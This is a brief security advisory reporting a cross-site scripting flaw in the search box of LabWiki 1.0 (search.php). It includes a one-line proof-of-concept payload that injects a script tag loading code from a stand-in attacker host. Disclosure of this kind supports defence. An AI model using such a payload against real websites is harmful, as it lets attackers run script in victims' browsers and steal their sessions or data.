LabWiki 1.0 Homepage: http://www.bioinformatics.org/phplabware/labwiki/index.php Effected files: search.php The search input box does not sanatize user input before dynamically genrating it. XSS Proof of concept: "><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"